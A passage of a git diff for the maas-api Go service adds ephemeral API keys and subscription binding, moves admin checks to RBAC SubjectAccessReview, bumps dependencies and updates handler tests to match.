efficiently +-- Partial index only includes ephemeral keys to minimize index size +-- Note: ephemeral column excluded from index key since WHERE clause already filters it +CREATE INDEX IF NOT EXISTS idx_api_keys_ephemeral_expired +ON api_keys(status, expires_at) +WHERE ephemeral = TRUE; diff --git a/maas-api/db/schema/0003_add_subscription_column.up.sql b/maas-api/db/schema/0003_add_subscription_column.up.sql new file mode 100644 index 000000000..0bf4b21a0 --- /dev/null +++ b/maas-api/db/schema/0003_add_subscription_column.up.sql @@ -0,0 +1,5 @@ +-- Schema for API Key Management: 0003_add_subscription_column.up.sql +-- Description: Add subscription column — binds each 
API key to a MaaSSubscription name at mint time + +-- Add subscription column (idempotent). Value is MaaSSubscription metadata.name, resolved when the key is created. Existing rows are backfilled with '' (no subscription recorded). +ALTER TABLE api_keys ADD COLUMN IF NOT EXISTS subscription TEXT NOT NULL DEFAULT ''; diff --git a/maas-api/go.mod b/maas-api/go.mod index 12dea2f7c..943d369eb 100644 --- a/maas-api/go.mod +++ b/maas-api/go.mod @@ -107,15 +107,15 @@ require ( github.com/ugorji/go/codec v1.3.0 // indirect github.com/x448/float16 v0.8.4 // indirect github.com/zeebo/errs v1.4.0 // indirect - go.opentelemetry.io/auto/sdk v1.1.0 // indirect + go.opentelemetry.io/auto/sdk v1.2.1 // indirect go.opentelemetry.io/contrib/detectors/gcp v1.36.0 // indirect go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc v0.61.0 // indirect go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.62.0 // indirect - go.opentelemetry.io/otel v1.37.0 // indirect - go.opentelemetry.io/otel/metric v1.37.0 // indirect - go.opentelemetry.io/otel/sdk v1.37.0 // indirect - go.opentelemetry.io/otel/sdk/metric v1.37.0 // indirect - go.opentelemetry.io/otel/trace v1.37.0 // indirect + go.opentelemetry.io/otel v1.40.0 // indirect + go.opentelemetry.io/otel/metric v1.40.0 // indirect + go.opentelemetry.io/otel/sdk v1.40.0 // indirect + go.opentelemetry.io/otel/sdk/metric v1.40.0 // indirect + go.opentelemetry.io/otel/trace v1.40.0 // indirect go.uber.org/multierr v1.11.0 // indirect go.yaml.in/yaml/v2 v2.4.2 // indirect go.yaml.in/yaml/v3 v3.0.4 // indirect @@ -123,7 +123,7 @@ require ( golang.org/x/crypto v0.45.0 // indirect golang.org/x/net v0.47.0 // indirect golang.org/x/oauth2 v0.30.0 // indirect - golang.org/x/sys v0.38.0 // indirect + golang.org/x/sys v0.40.0 // indirect golang.org/x/term v0.37.0 // indirect golang.org/x/text v0.31.0 // indirect golang.org/x/time v0.12.0 // indirect diff --git a/maas-api/go.sum b/maas-api/go.sum index ba857823b..01aec43cf 100644 --- a/maas-api/go.sum +++ b/maas-api/go.sum @@ -290,8 +290,8 @@ 
github.com/prometheus/common v0.66.1 h1:h5E0h5/Y8niHc5DlaLlWLArTQI7tMrsfQjHV+d9Z github.com/prometheus/common v0.66.1/go.mod h1:gcaUsgf3KfRSwHY4dIMXLPV0K/Wg1oZ8+SbZk/HH/dA= github.com/prometheus/procfs v0.17.0 h1:FuLQ+05u4ZI+SS/w9+BWEM2TXiHKsUQ9TADiRH7DuK0= github.com/prometheus/procfs v0.17.0/go.mod h1:oPQLaDAMRbA+u8H5Pbfq+dl3VDAvHxMUOVhe0wYB2zw= -github.com/rogpeppe/go-internal v1.13.1 h1:KvO1DLK/DRN07sQ1LQKScxyZJuNnedQ5/wKSR38lUII= -github.com/rogpeppe/go-internal v1.13.1/go.mod h1:uMEvuHeurkdAXX61udpOXGD/AzZDWNMNyH2VO9fmH0o= +github.com/rogpeppe/go-internal v1.14.1 h1:UQB4HGPB6osV0SQTLymcB4TgvyWu6ZyliaW0tI/otEQ= +github.com/rogpeppe/go-internal v1.14.1/go.mod h1:MaRKkUm5W0goXpeCfT7UZI6fk/L7L7so1lCWt35ZSgc= github.com/spf13/pflag v1.0.10 h1:4EBh2KAYBwaONj6b2Ye1GiHfwjqyROoF4RwYO+vPwFk= github.com/spf13/pflag v1.0.10/go.mod h1:McXfInJRrz4CZXVZOBLb0bTZqETkiAhM9Iw0y3An2Bg= github.com/spiffe/go-spiffe/v2 v2.5.0 h1:N2I01KCUkv1FAjZXJMwh95KK1ZIQLYbPfhaxw8WS0hE= @@ -330,26 +330,26 @@ github.com/zeebo/errs v1.4.0 h1:XNdoD/RRMKP7HD0UhJnIzUy74ISdGGxURlYG8HSWSfM= github.com/zeebo/errs v1.4.0/go.mod h1:sgbWHsvVuTPHcqJJGQ1WhI5KbWlHYz+2+2C/LSEtCw4= go.opencensus.io v0.21.0/go.mod h1:mSImk1erAIZhrmZN+AvHh14ztQfjbGwt4TtuofqLduU= go.opencensus.io v0.22.0/go.mod h1:+kGneAE2xo2IficOXnaByMWTGM9T73dGwxeWcUqIpI8= -go.opentelemetry.io/auto/sdk v1.1.0 h1:cH53jehLUN6UFLY71z+NDOiNJqDdPRaXzTel0sJySYA= -go.opentelemetry.io/auto/sdk v1.1.0/go.mod h1:3wSPjt5PWp2RhlCcmmOial7AvC4DQqZb7a7wCow3W8A= +go.opentelemetry.io/auto/sdk v1.2.1 h1:jXsnJ4Lmnqd11kwkBV2LgLoFMZKizbCi5fNZ/ipaZ64= +go.opentelemetry.io/auto/sdk v1.2.1/go.mod h1:KRTj+aOaElaLi+wW1kO/DZRXwkF4C5xPbEe3ZiIhN7Y= go.opentelemetry.io/contrib/detectors/gcp v1.36.0 h1:F7q2tNlCaHY9nMKHR6XH9/qkp8FktLnIcy6jJNyOCQw= go.opentelemetry.io/contrib/detectors/gcp v1.36.0/go.mod h1:IbBN8uAIIx734PTonTPxAxnjc2pQTxWNkwfstZ+6H2k= go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc v0.61.0 
h1:q4XOmH/0opmeuJtPsbFNivyl7bCt7yRBbeEm2sC/XtQ= go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc v0.61.0/go.mod h1:snMWehoOh2wsEwnvvwtDyFCxVeDAODenXHtn5vzrKjo= go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.62.0 h1:Hf9xI/XLML9ElpiHVDNwvqI0hIFlzV8dgIr35kV1kRU= go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.62.0/go.mod h1:NfchwuyNoMcZ5MLHwPrODwUF1HWCXWrL31s8gSAdIKY= -go.opentelemetry.io/otel v1.37.0 h1:9zhNfelUvx0KBfu/gb+ZgeAfAgtWrfHJZcAqFC228wQ= -go.opentelemetry.io/otel v1.37.0/go.mod h1:ehE/umFRLnuLa/vSccNq9oS1ErUlkkK71gMcN34UG8I= +go.opentelemetry.io/otel v1.40.0 h1:oA5YeOcpRTXq6NN7frwmwFR0Cn3RhTVZvXsP4duvCms= +go.opentelemetry.io/otel v1.40.0/go.mod h1:IMb+uXZUKkMXdPddhwAHm6UfOwJyh4ct1ybIlV14J0g= go.opentelemetry.io/otel/exporters/stdout/stdoutmetric v1.36.0 h1:rixTyDGXFxRy1xzhKrotaHy3/KXdPhlWARrCgK+eqUY= go.opentelemetry.io/otel/exporters/stdout/stdoutmetric v1.36.0/go.mod h1:dowW6UsM9MKbJq5JTz2AMVp3/5iW5I/TStsk8S+CfHw= -go.opentelemetry.io/otel/metric v1.37.0 h1:mvwbQS5m0tbmqML4NqK+e3aDiO02vsf/WgbsdpcPoZE= -go.opentelemetry.io/otel/metric v1.37.0/go.mod h1:04wGrZurHYKOc+RKeye86GwKiTb9FKm1WHtO+4EVr2E= -go.opentelemetry.io/otel/sdk v1.37.0 h1:ItB0QUqnjesGRvNcmAcU0LyvkVyGJ2xftD29bWdDvKI= -go.opentelemetry.io/otel/sdk v1.37.0/go.mod h1:VredYzxUvuo2q3WRcDnKDjbdvmO0sCzOvVAiY+yUkAg= -go.opentelemetry.io/otel/sdk/metric v1.37.0 h1:90lI228XrB9jCMuSdA0673aubgRobVZFhbjxHHspCPc= -go.opentelemetry.io/otel/sdk/metric v1.37.0/go.mod h1:cNen4ZWfiD37l5NhS+Keb5RXVWZWpRE+9WyVCpbo5ps= -go.opentelemetry.io/otel/trace v1.37.0 h1:HLdcFNbRQBE2imdSEgm/kwqmQj1Or1l/7bW6mxVK7z4= -go.opentelemetry.io/otel/trace v1.37.0/go.mod h1:TlgrlQ+PtQO5XFerSPUYG0JSgGyryXewPGyayAWSBS0= +go.opentelemetry.io/otel/metric v1.40.0 h1:rcZe317KPftE2rstWIBitCdVp89A2HqjkxR3c11+p9g= +go.opentelemetry.io/otel/metric v1.40.0/go.mod h1:ib/crwQH7N3r5kfiBZQbwrTge743UDc7DTFVZrrXnqc= +go.opentelemetry.io/otel/sdk v1.40.0 
h1:KHW/jUzgo6wsPh9At46+h4upjtccTmuZCFAc9OJ71f8= +go.opentelemetry.io/otel/sdk v1.40.0/go.mod h1:Ph7EFdYvxq72Y8Li9q8KebuYUr2KoeyHx0DRMKrYBUE= +go.opentelemetry.io/otel/sdk/metric v1.40.0 h1:mtmdVqgQkeRxHgRv4qhyJduP3fYJRMX4AtAlbuWdCYw= +go.opentelemetry.io/otel/sdk/metric v1.40.0/go.mod h1:4Z2bGMf0KSK3uRjlczMOeMhKU2rhUqdWNoKcYrtcBPg= +go.opentelemetry.io/otel/trace v1.40.0 h1:WA4etStDttCSYuhwvEa8OP8I5EWu24lkOzp+ZYblVjw= +go.opentelemetry.io/otel/trace v1.40.0/go.mod h1:zeAhriXecNGP/s2SEG3+Y8X9ujcJOTqQ5RgdEJcawiA= go.uber.org/goleak v1.3.0 h1:2K3zAYmnTNqV73imy9J1T3WC+gmCePx2hEGkimedGto= go.uber.org/goleak v1.3.0/go.mod h1:CoHD4mav9JJNrW/WLlf7HGZPjdw8EucARQHekz1X6bE= go.uber.org/multierr v1.11.0 h1:blXXJkSxSSfBVBlC76pxqeO+LN3aDfLQo+309xJstO0= @@ -420,8 +420,8 @@ golang.org/x/sys v0.0.0-20190624142023-c5567b49c5d0/go.mod h1:h1NjWce9XRLGQEsW7w golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.1.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= -golang.org/x/sys v0.38.0 h1:3yZWxaJjBmCWXqhN1qh02AkOnCQ1poK6oF+a7xWL6Gc= -golang.org/x/sys v0.38.0/go.mod h1:OgkHotnGiDImocRcuBABYBEXf8A9a87e/uXjp9XT3ks= +golang.org/x/sys v0.40.0 h1:DBZZqJ2Rkml6QMQsZywtnjnnGvHza6BTfYFWY9kjEWQ= +golang.org/x/sys v0.40.0/go.mod h1:OgkHotnGiDImocRcuBABYBEXf8A9a87e/uXjp9XT3ks= golang.org/x/term v0.37.0 h1:8EGAD0qCmHYZg6J17DvsMy9/wJ7/D/4pV/wfnld5lTU= golang.org/x/term v0.37.0/go.mod h1:5pB4lxRNYYVZuTLmy8oR2BH8dflOR+IbTYFD8fi3254= golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= diff --git a/maas-api/internal/api_keys/handler.go b/maas-api/internal/api_keys/handler.go index eb570a52c..a80c78550 100644 --- a/maas-api/internal/api_keys/handler.go +++ b/maas-api/internal/api_keys/handler.go @@ -1,23 +1,32 @@ package api_keys import ( + "context" "errors" "fmt" "net/http" - "strconv" "strings" "time" 
"github.com/gin-gonic/gin" "github.com/opendatahub-io/models-as-a-service/maas-api/internal/logger" + "github.com/opendatahub-io/models-as-a-service/maas-api/internal/subscription" "github.com/opendatahub-io/models-as-a-service/maas-api/internal/token" ) +// API key creation: single client-visible outcome for subscription resolution failures so we do not +// distinguish not-found, access denied, or no default subscription (enumeration / permission hints). +const ( + apiKeySubscriptionResolutionErrCode = "invalid_subscription" + apiKeySubscriptionResolutionErrMsg = "Unable to resolve a subscription for this API key" //nolint:gosec // G101: public JSON error text, not a credential +) + // AdminChecker is an interface for checking if a user is an admin. -// This allows for different implementations (e.g., Auth CR-based, hardcoded, mock for testing). +// The SARAdminChecker implementation uses Kubernetes SubjectAccessReview +// to check if the user can create maasauthpolicies (RBAC-based admin detection). type AdminChecker interface { - IsAdmin(userGroups []string) bool + IsAdmin(ctx context.Context, user *token.UserContext) bool } type Handler struct { @@ -58,144 +67,26 @@ func (h *Handler) getUserContext(c *gin.Context) *token.UserContext { return user } -// isAdmin checks if the user has admin privileges based on Auth CR (services.opendatahub.io/v1alpha1). -// The Auth CR defines adminGroups that are allowed to perform admin operations. -// Returns true if the user belongs to at least one admin group, false otherwise. -func (h *Handler) isAdmin(user *token.UserContext) bool { - if h == nil || h.adminChecker == nil || user == nil { +// isAdmin checks if the user has admin privileges via SubjectAccessReview. +// Admin is determined by RBAC: can user create maasauthpolicies in the configured MaaS namespace? +// Returns true if the user has admin RBAC permissions, false otherwise. 
+func (h *Handler) isAdmin(ctx context.Context, user *token.UserContext) bool { + if h == nil || user == nil { return false } - return h.adminChecker.IsAdmin(user.Groups) + return h.adminChecker.IsAdmin(ctx, user) } // isAuthorizedForKey checks if the user is authorized to access the API key. // User is authorized if they own the key or are an admin. -func (h *Handler) isAuthorizedForKey(user *token.UserContext, keyOwner string) bool { +func (h *Handler) isAuthorizedForKey(ctx context.Context, user *token.UserContext, keyOwner string) bool { // Check if user owns the key if user.Username == keyOwner { return true } // Check if user is admin - return h.isAdmin(user) -} - -// parsePaginationParams extracts and validates pagination query parameters. -func (h *Handler) parsePaginationParams(c *gin.Context) (PaginationParams, error) { - const ( - defaultLimit = 50 - maxLimit = 100 - ) - - params := PaginationParams{ - Limit: defaultLimit, - Offset: 0, - } - - // Parse limit - if limitStr := c.Query("limit"); limitStr != "" { - limit, err := strconv.Atoi(limitStr) - if err != nil { - return params, errors.New("invalid limit parameter: must be a number") - } - if limit < 1 { - return params, errors.New("invalid limit parameter: must be at least 1") - } - // Silently cap at maximum (user-friendly) - if limit > maxLimit { - limit = maxLimit - } - params.Limit = limit - } - - // Parse offset - if offsetStr := c.Query("offset"); offsetStr != "" { - offset, err := strconv.Atoi(offsetStr) - if err != nil { - return params, errors.New("invalid offset parameter: must be a number") - } - if offset < 0 { - return params, errors.New("invalid offset parameter: must be non-negative") - } - params.Offset = offset - } - - return params, nil -} - -func (h *Handler) ListAPIKeys(c *gin.Context) { - user := h.getUserContext(c) - if user == nil { - return - } - - // Check if user is admin - isAdmin := h.isAdmin(user) - - // Parse filter parameters - filterUsername := c.Query("username") - 
filterStatus := c.Query("status") - - // Determine target username for filtering - var targetUsername string - if isAdmin { - // Admin behavior: default to ALL users (empty string), or filter if provided - targetUsername = filterUsername // Empty string = all users - } else { - // Regular user behavior: always filter to own keys only - if filterUsername != "" && filterUsername != user.Username { - c.JSON(http.StatusForbidden, gin.H{ - "error": "non-admin users can only view their own API keys", - }) - return - } - targetUsername = user.Username // Always their own username - } - - // Parse status filters - var statusFilters []string - if filterStatus != "" { - statusFilters = strings.Split(filterStatus, ",") - // Validate each status using allowlist - for _, status := range statusFilters { - trimmed := strings.TrimSpace(status) - if !ValidStatuses[trimmed] { - c.JSON(http.StatusBadRequest, gin.H{ - "error": fmt.Sprintf("invalid status '%s': must be active, revoked, or expired", status), - }) - return - } - } - } - - // Parse pagination parameters - params, err := h.parsePaginationParams(c) - if err != nil { - c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) - return - } - - // Get paginated results with filters - result, err := h.service.List(c.Request.Context(), targetUsername, params, statusFilters) - if err != nil { - h.logger.Error("Failed to list API keys", - "error", err, - "username", targetUsername, - "limit", params.Limit, - "offset", params.Offset, - ) - c.JSON(http.StatusInternalServerError, gin.H{"error": "Failed to list api keys"}) - return - } - - // Build response - response := ListAPIKeysResponse{ - Object: "list", - Data: result.Keys, - HasMore: result.HasMore, - } - - c.JSON(http.StatusOK, response) + return h.isAdmin(ctx, user) } func (h *Handler) GetAPIKey(c *gin.Context) { @@ -226,7 +117,7 @@ func (h *Handler) GetAPIKey(c *gin.Context) { } // Check authorization - user must own the key or be admin - if !h.isAuthorizedForKey(user, 
tok.Username) { + if !h.isAuthorizedForKey(c.Request.Context(), user, tok.Username) { h.logger.Warn("Unauthorized API key access attempt", "requestingUser", user.Username, "keyOwner", tok.Username, @@ -241,17 +132,20 @@ func (h *Handler) GetAPIKey(c *gin.Context) { } // CreateAPIKeyRequest is the request body for creating an API key. -// Keys can be permanent (no expiresIn) or expiring (with expiresIn). +// Name is required for regular keys but optional for ephemeral keys. +// If expiresIn is not provided, defaults to API_KEY_MAX_EXPIRATION_DAYS (or 1hr for ephemeral). // Users can only create keys for themselves - the key inherits the user's groups. type CreateAPIKeyRequest struct { - Name string `binding:"required" json:"name"` - Description string `json:"description,omitempty"` - ExpiresIn *token.Duration `json:"expiresIn,omitempty"` // Optional - nil means permanent + Name string `json:"name,omitempty"` // Required for regular keys, optional for ephemeral + Description string `json:"description,omitempty"` + Subscription string `json:"subscription,omitempty"` // Optional MaaSSubscription name; when omitted, highest-priority accessible subscription is used + ExpiresIn *token.Duration `json:"expiresIn,omitempty"` // Optional - defaults to API_KEY_MAX_EXPIRATION_DAYS (1hr for ephemeral) + Ephemeral bool `json:"ephemeral,omitempty"` // Short-lived programmatic token (default: false) } // CreateAPIKey handles POST /v1/api-keys // Creates a new API key (sk-oai-* format) per Feature Refinement. -// Keys can be permanent (no expiresIn) or expiring (with expiresIn). +// If expiresIn is not provided, defaults to API_KEY_MAX_EXPIRATION_DAYS (1hr for ephemeral). // Per "Keys Shown Only Once": key is returned ONCE at creation and never again. // Users can only create keys for themselves - the key inherits the user's groups. 
func (h *Handler) CreateAPIKey(c *gin.Context) { @@ -266,18 +160,48 @@ func (h *Handler) CreateAPIKey(c *gin.Context) { return } + // Validate name requirement for non-ephemeral keys + if !req.Ephemeral && req.Name == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "name is required for non-ephemeral keys"}) + return + } + + // Auto-generate name for ephemeral keys if not provided + name := req.Name + if req.Ephemeral && name == "" { + name = fmt.Sprintf("ephemeral-%d", time.Now().UnixNano()) + } + // Parse expiration duration if provided var expiresIn *time.Duration if req.ExpiresIn != nil { d := req.ExpiresIn.Duration expiresIn = &d + } else if req.Ephemeral { + // Default 1hr expiration for ephemeral keys + d := 1 * time.Hour + expiresIn = &d } // Create key for the authenticated user with their groups - result, err := h.service.CreateAPIKey(c.Request.Context(), user.Username, user.Groups, req.Name, req.Description, expiresIn) + result, err := h.service.CreateAPIKey(c.Request.Context(), user.Username, user.Groups, name, req.Description, expiresIn, req.Ephemeral, strings.TrimSpace(req.Subscription)) if err != nil { h.logger.Error("Failed to create API key", "error", err) - c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + if errors.Is(err, ErrExpirationNotPositive) || errors.Is(err, ErrExpirationExceedsMax) { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + var notFound *subscription.SubscriptionNotFoundError + var accessDenied *subscription.AccessDeniedError + var noSub *subscription.NoSubscriptionError + if errors.As(err, ¬Found) || errors.As(err, &accessDenied) || errors.As(err, &noSub) { + c.JSON(http.StatusBadRequest, gin.H{ + "error": apiKeySubscriptionResolutionErrMsg, + "code": apiKeySubscriptionResolutionErrCode, + }) + return + } + c.JSON(http.StatusInternalServerError, gin.H{"error": "Failed to create API key"}) return } @@ -286,6 +210,7 @@ func (h *Handler) CreateAPIKey(c *gin.Context) { "keyPrefix", 
result.KeyPrefix, "username", user.Username, "groups", user.Groups, + "ephemeral", req.Ephemeral, ) // Return the key - THIS IS THE ONLY TIME THE PLAINTEXT IS SHOWN @@ -353,7 +278,7 @@ func (h *Handler) RevokeAPIKey(c *gin.Context) { } // Check authorization - user must own the key or be admin - if !h.isAuthorizedForKey(user, keyMetadata.Username) { + if !h.isAuthorizedForKey(c.Request.Context(), user, keyMetadata.Username) { h.logger.Warn("Unauthorized API key revocation attempt", "requestingUser", user.Username, "keyOwner", keyMetadata.Username, @@ -431,7 +356,7 @@ func (h *Handler) SearchAPIKeys(c *gin.Context) { } // Determine target username for filtering - isAdmin := h.isAdmin(user) + isAdmin := h.isAdmin(c.Request.Context(), user) targetUsername := req.Filters.Username if !isAdmin { @@ -527,7 +452,7 @@ func (h *Handler) BulkRevokeAPIKeys(c *gin.Context) { } // Authorization: users can revoke own keys, admins can revoke any user's keys - if req.Username != user.Username && !h.isAdmin(user) { + if req.Username != user.Username && !h.isAdmin(c.Request.Context(), user) { h.logger.Warn("Unauthorized bulk revoke attempt", "requestingUser", user.Username, "targetUser", req.Username, diff --git a/maas-api/internal/api_keys/handler_test.go b/maas-api/internal/api_keys/handler_test.go index 0abadaebb..be62ccf03 100644 --- a/maas-api/internal/api_keys/handler_test.go +++ b/maas-api/internal/api_keys/handler_test.go @@ -17,15 +17,53 @@ import ( "github.com/opendatahub-io/models-as-a-service/maas-api/internal/config" "github.com/opendatahub-io/models-as-a-service/maas-api/internal/logger" + "github.com/opendatahub-io/models-as-a-service/maas-api/internal/subscription" "github.com/opendatahub-io/models-as-a-service/maas-api/internal/token" ) +const testSubscriptionName = "test-subscription" + +// fixedSubSelector satisfies SubscriptionSelector for handler tests (no cluster subscriptions). 
+type fixedSubSelector struct{} + +func (fixedSubSelector) Select(_ []string, _ string, requested string, _ string) (*subscription.SelectResponse, error) { + if requested != "" { + return &subscription.SelectResponse{Name: requested}, nil + } + return &subscription.SelectResponse{Name: testSubscriptionName}, nil +} + +func (fixedSubSelector) SelectHighestPriority(_ []string, _ string) (*subscription.SelectResponse, error) { + return &subscription.SelectResponse{Name: testSubscriptionName}, nil +} + +// errSubSelector returns fixed errors from Select / SelectHighestPriority (for handler HTTP mapping tests). +type errSubSelector struct { + selectErr error + highestPriorityErr error +} + +func (e errSubSelector) Select(_ []string, _ string, _ string, _ string) (*subscription.SelectResponse, error) { + if e.selectErr != nil { + return nil, e.selectErr + } + return &subscription.SelectResponse{Name: "stub-sub"}, nil +} + +func (e errSubSelector) SelectHighestPriority(_ []string, _ string) (*subscription.SelectResponse, error) { + if e.highestPriorityErr != nil { + return nil, e.highestPriorityErr + } + return &subscription.SelectResponse{Name: testSubscriptionName}, nil +} + // Test constants. const ( testBulkRevokeAliceJSON = `{"username": "alice"}` ) // mockAdminChecker is a simple mock for testing that checks if user has "admin-users" group. +// This simulates the SAR check by checking group membership (for test simplicity). 
type mockAdminChecker struct { adminGroups []string } @@ -36,8 +74,11 @@ func newMockAdminChecker() *mockAdminChecker { } } -func (m *mockAdminChecker) IsAdmin(userGroups []string) bool { - for _, userGroup := range userGroups { +func (m *mockAdminChecker) IsAdmin(_ context.Context, user *token.UserContext) bool { + if user == nil { + return false + } + for _, userGroup := range user.Groups { if slices.Contains(m.adminGroups, userGroup) { return true } @@ -68,20 +109,21 @@ func TestIsAuthorizedForKey(t *testing.T) { h := &Handler{ adminChecker: newMockAdminChecker(), } + ctx := context.Background() t.Run("OwnerCanAccess", func(t *testing.T) { user := &token.UserContext{Username: "alice", Groups: []string{"users"}} - assert.True(t, h.isAuthorizedForKey(user, "alice")) + assert.True(t, h.isAuthorizedForKey(ctx, user, "alice")) }) t.Run("NonOwnerCannotAccess", func(t *testing.T) { user := &token.UserContext{Username: "bob", Groups: []string{"users"}} - assert.False(t, h.isAuthorizedForKey(user, "alice")) + assert.False(t, h.isAuthorizedForKey(ctx, user, "alice")) }) t.Run("AdminCanAccessAnyKey", func(t *testing.T) { admin := &token.UserContext{Username: "admin", Groups: []string{"admin-users"}} - assert.True(t, h.isAuthorizedForKey(admin, "alice")) + assert.True(t, h.isAuthorizedForKey(ctx, admin, "alice")) }) } @@ -93,7 +135,7 @@ func TestSearchAPIKeys_EmptyRequest(t *testing.T) { gin.SetMode(gin.TestMode) store := NewMockStore() cfg := &config.Config{} - service := NewServiceWithLogger(store, cfg, logger.Development()) + service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development()) handler := NewHandler(logger.Development(), service, newMockAdminChecker()) testUser := &token.UserContext{ @@ -103,12 +145,12 @@ func TestSearchAPIKeys_EmptyRequest(t *testing.T) { // Create test keys ctx := context.Background() - err := store.AddKey(ctx, testUser.Username, "key-1", "hash-1", "Key 1", "", []string{"system:authenticated"}, nil) + err := 
store.AddKey(ctx, testUser.Username, "key-1", "hash-1", "Key 1", "", []string{"system:authenticated"}, testSubscriptionName, nil, false) require.NoError(t, err) - err = store.AddKey(ctx, testUser.Username, "key-2", "hash-2", "Key 2", "", []string{"system:authenticated"}, nil) + err = store.AddKey(ctx, testUser.Username, "key-2", "hash-2", "Key 2", "", []string{"system:authenticated"}, testSubscriptionName, nil, false) require.NoError(t, err) // Create a revoked key - err = store.AddKey(ctx, testUser.Username, "key-3", "hash-3", "Key 3", "", []string{"system:authenticated"}, nil) + err = store.AddKey(ctx, testUser.Username, "key-3", "hash-3", "Key 3", "", []string{"system:authenticated"}, testSubscriptionName, nil, false) require.NoError(t, err) err = store.Revoke(ctx, "key-3") require.NoError(t, err) @@ -139,7 +181,7 @@ func TestSearchAPIKeys_Pagination(t *testing.T) { gin.SetMode(gin.TestMode) store := NewMockStore() cfg := &config.Config{} - service := NewServiceWithLogger(store, cfg, logger.Development()) + service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development()) handler := NewHandler(logger.Development(), service, newMockAdminChecker()) testUser := &token.UserContext{ @@ -153,7 +195,7 @@ func TestSearchAPIKeys_Pagination(t *testing.T) { keyID := fmt.Sprintf("key-%d", i) keyHash := fmt.Sprintf("hash-%d", i) name := fmt.Sprintf("Key %d", i) - err := store.AddKey(ctx, testUser.Username, keyID, keyHash, name, "", []string{"system:authenticated"}, nil) + err := store.AddKey(ctx, testUser.Username, keyID, keyHash, name, "", []string{"system:authenticated"}, testSubscriptionName, nil, false) require.NoError(t, err) } @@ -243,7 +285,7 @@ func TestSearchAPIKeys_StatusFilter(t *testing.T) { gin.SetMode(gin.TestMode) store := NewMockStore() cfg := &config.Config{} - service := NewServiceWithLogger(store, cfg, logger.Development()) + service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development()) handler := 
NewHandler(logger.Development(), service, newMockAdminChecker()) ctx := context.Background() @@ -253,9 +295,9 @@ func TestSearchAPIKeys_StatusFilter(t *testing.T) { } // Create active and revoked keys - err := store.AddKey(ctx, testUser.Username, "active-key", "active-hash", "Active Key", "", []string{"system:authenticated"}, nil) + err := store.AddKey(ctx, testUser.Username, "active-key", "active-hash", "Active Key", "", []string{"system:authenticated"}, testSubscriptionName, nil, false) require.NoError(t, err) - err = store.AddKey(ctx, testUser.Username, "revoked-key", "revoked-hash", "Revoked Key", "", []string{"system:authenticated"}, nil) + err = store.AddKey(ctx, testUser.Username, "revoked-key", "revoked-hash", "Revoked Key", "", []string{"system:authenticated"}, testSubscriptionName, nil, false) require.NoError(t, err) err = store.Revoke(ctx, "revoked-key") require.NoError(t, err) @@ -369,7 +411,7 @@ func TestSearchAPIKeys_Sorting(t *testing.T) { gin.SetMode(gin.TestMode) store := NewMockStore() cfg := &config.Config{} - service := NewServiceWithLogger(store, cfg, logger.Development()) + service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development()) handler := NewHandler(logger.Development(), service, newMockAdminChecker()) ctx := context.Background() @@ -379,11 +421,11 @@ func TestSearchAPIKeys_Sorting(t *testing.T) { } // Create keys with different names - err := store.AddKey(ctx, testUser.Username, "key-1", "hash-1", "Charlie", "", []string{"system:authenticated"}, nil) + err := store.AddKey(ctx, testUser.Username, "key-1", "hash-1", "Charlie", "", []string{"system:authenticated"}, testSubscriptionName, nil, false) require.NoError(t, err) - err = store.AddKey(ctx, testUser.Username, "key-2", "hash-2", "Alice", "", []string{"system:authenticated"}, nil) + err = store.AddKey(ctx, testUser.Username, "key-2", "hash-2", "Alice", "", []string{"system:authenticated"}, testSubscriptionName, nil, false) require.NoError(t, err) - err = 
store.AddKey(ctx, testUser.Username, "key-3", "hash-3", "Bob", "", []string{"system:authenticated"}, nil) + err = store.AddKey(ctx, testUser.Username, "key-3", "hash-3", "Bob", "", []string{"system:authenticated"}, testSubscriptionName, nil, false) require.NoError(t, err) t.Run("DefaultSort_CreatedAtDesc", func(t *testing.T) { @@ -494,7 +536,7 @@ func TestSearchAPIKeys_AdminVsRegularUser(t *testing.T) { gin.SetMode(gin.TestMode) store := NewMockStore() cfg := &config.Config{} - service := NewServiceWithLogger(store, cfg, logger.Development()) + service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development()) handler := NewHandler(logger.Development(), service, newMockAdminChecker()) ctx := context.Background() @@ -506,7 +548,7 @@ func TestSearchAPIKeys_AdminVsRegularUser(t *testing.T) { keyID := fmt.Sprintf("%s-key-%d", username, i) keyHash := fmt.Sprintf("%s-hash-%d", username, i) name := fmt.Sprintf("%s Key %d", username, i) - err := store.AddKey(ctx, username, keyID, keyHash, name, "", []string{"system:authenticated"}, nil) + err := store.AddKey(ctx, username, keyID, keyHash, name, "", []string{"system:authenticated"}, testSubscriptionName, nil, false) require.NoError(t, err) } } @@ -614,7 +656,7 @@ func TestSearchAPIKeys_AdminFiltersByUsernameAndStatus(t *testing.T) { gin.SetMode(gin.TestMode) store := NewMockStore() cfg := &config.Config{} - service := NewServiceWithLogger(store, cfg, logger.Development()) + service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development()) handler := NewHandler(logger.Development(), service, newMockAdminChecker()) ctx := context.Background() @@ -627,14 +669,14 @@ func TestSearchAPIKeys_AdminFiltersByUsernameAndStatus(t *testing.T) { 